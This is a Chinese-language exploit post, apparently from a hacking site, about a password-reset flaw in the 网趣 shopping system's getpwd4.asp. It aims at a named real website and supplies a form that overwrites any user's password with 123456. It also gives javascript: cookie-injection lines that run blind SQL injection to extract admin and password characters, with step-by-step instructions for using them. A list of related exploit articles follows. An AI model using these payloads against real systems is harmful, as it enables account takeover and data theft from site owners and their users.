网趣漏洞说明:
最新问题出在getpwd4.asp 这个文件有注射漏洞!
因为程序思路是想接受从上一个设置密码的表单文件中提交过来的变量,不过在这里我们可以不给它提交表单变量,而让它来接受我们设置的cookie,passwd是用request.from 来接受的,所以我们用一下的表单提交。
表单内容:
<form method="post" action="http://www.shouji168.net/getpwd4.asp" >
<!--下面的123456要改成的新密码-->
<input name="passwd" type="text" id="receipt" size="12" value="123456">
<input class=go-wenbenkuang type="submit" value=" 设置密码 " name="submit">
</form>
语句:
改任意用户密码。
javascript:alert(document.cookie="username="+escape("windows")
测试注入:
javascript:alert(document.cookie="username="+escape("windows' and '1'='1"))
javascript:alert(document.cookie="username="+escape("windows' and '1'='2"))
javascript:alert(document.cookie="username="+escape("windows' and (select len(password) from cnhww)>1 and '1'='1"))
javascript:alert(document.cookie="username="+escape("windows' and (select top 1 asc(mid(admin,1,1)) from cnhww)>96 and '1'='1"))
利用方式:
比如:第一个改任意用户密码
1: 首先将表单内容保存到本地,随便取个名字,htm的。
2:然后打开网站http://www.shouji168.net/ 在地址栏输入javascript:alert(document.cookie="username="+escape("windows")
(windows是已经有的用户,但是密码不清楚)
3:打开本地的表单,然后点设置密码
4:会出现密码更新成功,就被改为123456
第二个注入:方法更上面一样利用, 当1=1时 同样是会显示密码更新成功,但是等于2时会出现没有注册请到前台注册。
很明显有注入漏洞。
但是在遇到这个站的时候我有点蒙了,
希望大家看下
javascript:alert(document.cookie="username="+escape("windows' and (select top 1 len(password) from admin)>1 and '1'='1"))
执行后 应该存在admin这个表,但是可能语句问题 总出错
但是在猜password的asc码的时候
javascript:alert(document.cookie="username="+escape("windows' and (and (select top 1 asc(mid(password,1,1)) from admin)>107 and '1'='1"))
=========待补充
只显示10条记录相关文章
网趣网上购物多用户时尚版最新版本存在漏洞 (浏览: 8736, 评论: 0)
网趣网上购物系统时尚版10.3注入漏洞 (浏览: 12720, 评论: 0)
网趣网上购物系统时尚版V9.7注入漏洞--price.asp (浏览: 11293, 评论: 0)
网趣网上购物系统HTML静态版 v2010 注射 (浏览: 15968, 评论: 0)
网趣网上购物系统时尚版 v9.7/bbs后台真正拿shell (浏览: 12483, 评论: 0)
网趣购物商城V9.6SQL注入利程序 (浏览: 9735, 评论: 0)
网趣网上购物系统时尚版 v3.2注入漏洞 (浏览: 8705, 评论: 0)
网趣网上购物系统时尚版v3.0注册注射漏洞 (浏览: 10194, 评论: 0)
网趣网上购物系统SQL注入漏洞--getpwd2.asp (浏览: 7960, 评论: 0)